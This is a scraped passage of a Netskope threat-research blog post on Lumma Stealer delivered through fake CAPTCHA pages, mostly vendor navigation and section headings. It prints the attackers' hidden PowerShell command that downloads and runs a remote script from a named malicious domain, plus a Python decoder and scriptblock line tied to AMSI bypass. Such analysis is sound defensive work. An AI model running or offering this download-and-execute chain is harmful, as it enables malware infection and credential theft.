Netskope is recognized as a Leader again in the Gartner® Magic Quadrant™ for SASE Platforms. Get the Report

close
close
Your Network of Tomorrow
Your Network of Tomorrow
Plan your path toward a faster, more secure, and more resilient network designed for the applications and users that you support.
          Experience Netskope
          Get Hands-on With the Netskope Platform
          Here's your chance to experience the Netskope One single-cloud platform first-hand. Sign up for self-paced, hands-on labs, join us for monthly live product demos, take a free test drive of Netskope Private Access, or join us for a live, instructor-led workshops.
            A Leader in SSE. Now a Leader in Single-Vendor SASE.
            Netskope is recognized as a Leader Furthest in Vision for both SSE and SASE Platforms
            2X a Leader in the Gartner® Magic Quadrant for SASE Platforms
            One unified platform built for your journey
              Securing Generative AI for Dummies
              Securing Generative AI for Dummies
              Learn how your organization can balance the innovative potential of generative AI with robust data security practices.
                Modern data loss prevention (DLP) for Dummies eBook
                Modern Data Loss Prevention (DLP) for Dummies
                Get tips and tricks for transitioning to a cloud-delivered DLP.
                  Modern SD-WAN for SASE Dummies Book
                  Modern SD-WAN for SASE Dummies
                  Stop playing catch up with your networking architecture
                    Understanding where the risk lies
                    Advanced Analytics transforms the way security operations teams apply data-driven insights to implement better policies. With Advanced Analytics, you can identify trends, zero in on areas of concern and use the data to take action.
                        Netskope Technical Support
                        Netskope Technical Support
                        Our qualified support engineers are located worldwide and have diverse backgrounds in cloud security, networking, virtualization, content delivery, and software development, ensuring timely and quality technical assistance
                          Netskope video
                          Netskope Training
                          Netskope training will help you become a cloud security expert. We are here to help you secure your digital transformation journey and make the most of your cloud, web, and private applications.

                            Lumma Stealer: Fake CAPTCHAs & New Techniques to Evade Detection

                            Jan 23 2025

                            Summary

                            Key findings

                            Details

                            Infection chain flow
                            Fake CAPTCHA instruction
                            Fake CAPTCHA JavaScript snippet
                            Example of the malicious command in the Run window
                            Powershell command executed by the HTA file
                            "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h3.errantrefrainundocked.shop/riii2.aspx'))"
                            Example of the obfuscated PowerShell script
                            Relevant snippet responsible for the next stage execution
                            Formatted view of the relevant snippet
                            import base64

                            decimal_data = []
                            xor_key = b"AMSI_RESULT_NOT_DETECTED"
                            key_len = len(xor_key)
                            result = b""

                            encoded_str = "".join([chr(x) for x in decimal_data])
                            decoded_bytes = base64.b64decode(encoded_str)
                            i = 0

                            for i in range(len(decoded_bytes)):
                            result += bytes([decoded_bytes[i] ^ xor_key[i % key_len]])

                            print(result.decode())

                            The PowerShell line responsible for executing the next stage script can be translated into the following.

                            ((Scriptblock -as [Type])::(Create)((fdsjnh))).(Invoke)()
                            Code snippet responsible for bypassing AMSI checks
                            Code snippet responsible for decoding and executing Lumma Stealer
                            Example of Lumma Stealer entry

                            Netskope Detection

                            Conclusions

                            IOCs

                            author image
                            Leandro Fróes
                            Leandro Fróes is a Senior Threat Research Engineer at Netskope, where he focuses on malware research, reverse engineering, automation and product improvement.
                            Leandro Fróes is a Senior Threat Research Engineer at Netskope, where he focuses on malware research, reverse engineering, automation and product improvement.
                            Connect with Netskope

                            Subscribe to the Netskope Blog

                            Sign up to receive a roundup of the latest Netskope content delivered directly in your inbox every month.